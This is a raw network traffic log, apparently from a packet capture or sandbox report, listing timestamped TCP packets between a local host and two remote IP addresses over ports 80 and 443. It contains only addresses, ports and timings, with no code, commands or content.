Dec 28, 2024 09:29:48.105602980 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106061935 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106157064 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106161118 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106204033 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106251001 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106303930 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106308937 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106391907 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106403112 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.106475115 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106479883 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106508017 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106540918 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106544971 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.106570005 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106571913 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.106601954 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.106667042 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106709003 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106795073 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106805086 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106887102 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106892109 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106931925 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.106936932 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107069016 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107074976 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107122898 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107126951 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107199907 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107203960 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107319117 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107325077 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107357025 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107372046 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107465982 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107470989 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107533932 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107594967 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107635975 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107641935 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107753992 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107758999 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107805967 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107810974 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107908010 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.107913017 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.108009100 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.108012915 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.108022928 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.151424885 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.224194050 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.224215984 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.224289894 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.224296093 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.224395990 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.224416018 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.224448919 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.225821018 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.225902081 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.226028919 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226054907 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226138115 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226186991 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226260900 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226305008 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226439953 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226444960 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226455927 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226461887 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226541996 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226547956 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226664066 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226696014 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226819038 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226823092 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226875067 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.226927042 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227037907 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227042913 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227125883 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227138996 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227238894 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227242947 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227327108 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227330923 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227377892 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227416992 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227471113 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227484941 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227583885 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227612972 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227705956 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227710009 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227761984 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227813959 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227878094 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227883101 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.227968931 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228112936 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228117943 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228152037 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228308916 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228359938 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228419065 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228424072 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228466034 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228475094 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228513956 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228518963 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228578091 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228581905 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228641033 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228688955 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.228946924 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.229015112 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.345833063 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.345916986 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.345921040 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346029043 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346034050 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346172094 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346199036 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346312046 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346317053 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346641064 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346646070 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346692085 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346726894 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.346759081 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347278118 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347285032 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347340107 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347343922 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347842932 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347847939 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347938061 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347942114 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.347981930 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.348475933 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.348481894 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.348535061 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.348571062 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.349097013 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.349155903 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.349250078 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.349280119 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.349741936 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.349787951 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.349960089 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.349987030 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.350069046 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.350390911 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.350425959 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.350569963 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.350625038 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351126909 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351130962 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351176977 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351181984 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351254940 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351346970 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351351976 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351402998 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351407051 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351819992 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351880074 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351927996 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351948023 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.351986885 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.352077007 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.352330923 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:48.352435112 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.352458000 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.352543116 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.352547884 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353063107 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353072882 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353208065 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353214025 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353224993 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353681087 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353707075 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353807926 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.353812933 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.354271889 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.354285955 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.354350090 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.354355097 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355182886 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355252028 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355259895 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355272055 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355331898 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355806112 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355811119 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355844975 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.355894089 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.356395960 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.356416941 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.356511116 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.356515884 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.356586933 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.356590986 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357136965 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357141018 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357198000 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357202053 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357594013 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357619047 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357728004 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357732058 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.357780933 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.358246088 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.358258963 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.358376980 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.358381987 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.358896971 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.358901024 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.358937025 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.359009981 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.359015942 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.359455109 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.359461069 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.359497070 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472430944 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472450972 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472532034 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472572088 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472666979 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472671032 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472735882 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472740889 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472851992 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472856045 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472914934 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.472966909 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473057032 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473110914 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473153114 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473243952 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473373890 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473393917 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473494053 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473498106 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473619938 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473623991 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473664999 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473692894 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473814011 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473818064 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473871946 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473875999 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.473968983 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474044085 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474047899 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474060059 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474165916 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474176884 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474293947 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474301100 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474466085 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474469900 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474544048 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474549055 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474601984 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474633932 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474745989 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474750996 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:48.474766970 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:50.812779903 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:50.812851906 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:50.812932014 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:50.813198090 CET	49762	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:50.932696104 CET	80	49762	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:50.973381996 CET	49773	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:51.092962027 CET	80	49773	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:51.093092918 CET	49773	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:51.093384981 CET	49773	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:51.212752104 CET	80	49773	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:51.360985994 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:51.361064911 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:51.362418890 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:51.362418890 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:51.362493038 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:52.549942970 CET	80	49773	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:52.550082922 CET	80	49773	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:52.550141096 CET	49773	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:52.550299883 CET	49773	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:52.669729948 CET	80	49773	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:52.671482086 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:52.671566010 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:52.673687935 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:52.673695087 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:52.673940897 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:52.698225975 CET	49779	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:52.725289106 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:52.747071028 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:52.747109890 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:52.747205019 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:52.817814112 CET	80	49779	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:52.818053961 CET	49779	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:52.818582058 CET	49779	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:52.938019991 CET	80	49779	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:53.732347965 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:53.732445002 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:53.732513905 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:53.734601974 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:53.734625101 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:53.734638929 CET	49774	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:53.734646082 CET	443	49774	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:53.742460966 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:53.742491007 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:53.742589951 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:53.742878914 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:53.742892981 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:54.462794065 CET	80	49779	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:54.462814093 CET	80	49779	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:54.462912083 CET	49779	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:54.463191032 CET	49779	80	192.168.2.5	194.87.58.92
Dec 28, 2024 09:29:54.583334923 CET	80	49779	194.87.58.92	192.168.2.5
Dec 28, 2024 09:29:54.952879906 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:54.952954054 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:54.954727888 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:54.954742908 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:54.954986095 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:54.956130028 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:54.956248999 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:54.956279039 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.726481915 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.726538897 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.726572037 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.726608038 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.726638079 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.726653099 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.726681948 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.726696968 CET	443	49781	172.67.128.184	192.168.2.5
Dec 28, 2024 09:29:55.729068041 CET	49781	443	192.168.2.5	172.67.128.184
Dec 28, 2024 09:29:55.729085922 CET	443	49781	172.67.128.184	192.168.2.5
